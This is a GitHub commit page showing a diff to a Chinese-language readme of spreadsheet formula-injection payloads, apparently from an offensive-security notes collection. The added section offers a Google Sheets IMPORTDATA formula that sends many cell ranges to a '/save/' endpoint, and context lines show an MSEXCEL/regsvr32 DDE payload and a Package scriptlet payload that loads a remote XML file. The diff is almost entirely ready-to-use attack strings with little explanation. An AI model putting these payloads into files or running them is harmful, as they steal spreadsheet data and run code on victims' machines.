Skip to content

Commit 1e2975d

Browse files
author
Aaron Lewis
committed
增加 IMPORTDATA 说明
1 parent 6d1e15f commit 1e2975d

File tree

2 files changed

+14
-1
lines changed

2 files changed

+14
-1
lines changed

injections/readme.md

Lines changed: 13 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -18,4 +18,16 @@ fillerText1,fillerText2,fillerText3,=MSEXCEL|'\..\..\..\Windows\System32\regsvr3
1818

1919
```
2020
=Package|'scRiPt:http://XXXX/XXXX.xml'!""
21-
```
21+
```
22+
23+
### IMPORTDATA 后门
24+
25+
[参考文章: Server-Side Spreadsheet Injection – Formula Injection to Remote Code Execution](https://www.bishopfox.com/blog/2018/06/server-side-spreadsheet-injections/)
26+
27+
此方法只适合 Google Sheets,且随时可能修复
28+
29+
```
30+
=IFERROR(IMPORTDATA(CONCAT("http://127.0.0.1:8000/save/",JOIN(",",B3:B18,C3:C18,D3:D18
31+
,E3:E18,F3:F18,G3:G18,H3:H18,I3:I18,J3:J18,K3:K18,L3:L18,M3:M18,N3:N18,O3:O18,P3:P18,Q3:Q18,R3:R18))),"")
32+
```
33+

readme.md

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -46,4 +46,5 @@
4646
* [0x09AL/WordSteal - create a POC that will steal NTML hashes from a remote computer](https://github.com/0x09AL/WordSteal)
4747

4848
## 其它项目
49+
4950
* [office-exploit-case-study](https://github.com/houjingyi233/office-exploit-case-study)

0 commit comments

Comments
 (0)